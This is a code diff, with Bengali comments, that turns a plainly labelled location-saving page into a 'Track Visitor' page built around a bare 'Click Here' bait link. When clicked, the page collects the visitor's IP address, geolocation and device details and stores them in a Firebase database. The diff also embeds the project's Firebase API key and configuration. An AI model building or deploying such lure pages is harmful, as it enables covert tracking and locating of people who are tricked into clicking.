--- a/index.html
+++ b/index.html
@@ -3,64 +3,80 @@
 <head>
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <title>Location Tracker</title>
-    
+    <title>Track Visitor</title>
+</head>
+<body>
+
+    <h2>Click the link below to log your details:</h2>
+    <a href="#" id="trackLink">Click Here</a>
+
     <!-- Firebase SDK -->
     <script type="module">
-        // Import Firebase SDKs
-        import { initializeApp } from "https://www.gstatic.com/firebasejs/10.8.0/firebase-app.js";
-        import { getFirestore, collection, addDoc, serverTimestamp } from "https://www.gstatic.com/firebasejs/10.8.0/firebase-firestore.js";
+        // 🔹 Firebase Configuration
+        import { initializeApp } from "https://www.gstatic.com/firebasejs/10.7.1/firebase-app.js";
+        import { getFirestore, collection, addDoc } from "https://www.gstatic.com/firebasejs/10.7.1/firebase-firestore.js";
 
-        // 🔹 Firebase Config
         const firebaseConfig = {
             apiKey: "AIzaSyDiKFX20cKkhHU0OkAVw6Dv45lWUT7oz5Y",
             authDomain: "lucation1t.firebaseapp.com",
             projectId: "lucation1t",
-            storageBucket: "lucation1t.firebasestorage.app",
+            storageBucket: "lucation1t.appspot.com",  // এটি Firestore Storage থেকে নেওয়া
             messagingSenderId: "36109638018",
             appId: "1:36109638018:web:04733eb656519311e7979b",
             measurementId: "G-9BK23ZBMT6"
         };
 
-        // 🔹 Firebase Initializing
+        // 🔹 Firebase Initialize
         const app = initializeApp(firebaseConfig);
-        window.db = getFirestore(app); // Make db accessible globally
-    </script>
-</head>
-<body>
-    <h1>📍 লোকেশন ট্র্যাকার</h1>
-    <button onclick="saveUserData()">📍 আমার লোকেশন সংরক্ষণ করুন</button>
-    
-    <script>
-        // 🔹 লোকেশন সংগ্রহ ও Firestore-এ পাঠানোর ফাংশন
-        async function saveUserData() {
+        const db = getFirestore(app);
+
+        // 🔹 লোকেশন ও আইপি সংগ্রহ ও সংরক্ষণ
+        document.getElementById("trackLink").addEventListener("click", async function () {
+            let ip = "Not Available";
+            let lat = "Unknown";
+            let lon = "Unknown";
+            let userAgent = navigator.userAgent;
+
+            // 🔹 IP Address সংগ্রহ
+            try {
+                const ipResponse = await fetch("https://api64.ipify.org?format=json");
+                const ipData = await ipResponse.json();
+                ip = ipData.ip;
+            } catch (error) {
+                console.error("IP Fetch Error:", error);
+            }
+
+            // 🔹 লোকেশন সংগ্রহ
             if (navigator.geolocation) {
-                navigator.geolocation.getCurrentPosition(async (position) => {
-                    const latitude = position.coords.latitude;
-                    const longitude = position.coords.longitude;
-                    const userAgent = navigator.userAgent;
-
-                    // 🔹 ইউজারের আইপি সংগ্রহ
-                    const ipResponse = await fetch('https://api.ipify.org?format=json');
-                    const ipData = await ipResponse.json();
-                    const ipAddress = ipData.ip;
-
-                    try {
-                        // 🔹 Firestore-এ ডাটা সংরক্ষণ
-                        await addDoc(collection(window.db, "users_data"), {
-                            latitude: latitude,
-                            longitude: longitude,
-                            ip_address: ipAddress,
-                            device_info: userAgent,
-                            timestamp: serverTimestamp()
-                        });
-                        alert("✅ তথ্য সফলভাবে সংরক্ষণ হয়েছে!");
-                    } catch (error) {
-                        console.error("❌ ডাটা সংরক্ষণে সমস্যা:", error);
+                navigator.geolocation.getCurrentPosition(
+                    (position) => {
+                        lat = position.coords.latitude;
+                        lon = position.coords.longitude;
+                        saveData(ip, lat, lon, userAgent);
+                    },
+                    (error) => {
+                        console.error("Location Error:", error);
+                        saveData(ip, lat, lon, userAgent);
                     }
-                });
+                );
             } else {
-                alert("❌ আপনার ব্রাউজার Geolocation সাপোর্ট করে না!");
+                saveData(ip, lat, lon, userAgent);
+            }
+        });
+
+        // 🔹 Firestore-এ ডাটা সংরক্ষণ
+        async function saveData(ip, lat, lon, userAgent) {
+            try {
+                await addDoc(collection(db, "visitors_data"), {
+                    ip_address: ip,
+                    latitude: lat,
+                    longitude: lon,
+                    device_info: userAgent,
+                    timestamp: new Date().toISOString()
+                });
+                alert("✅ Data Saved Successfully!");
+            } catch (error) {
+                console.error("❌ Error Adding Document:", error);
             }
         }
     </script>
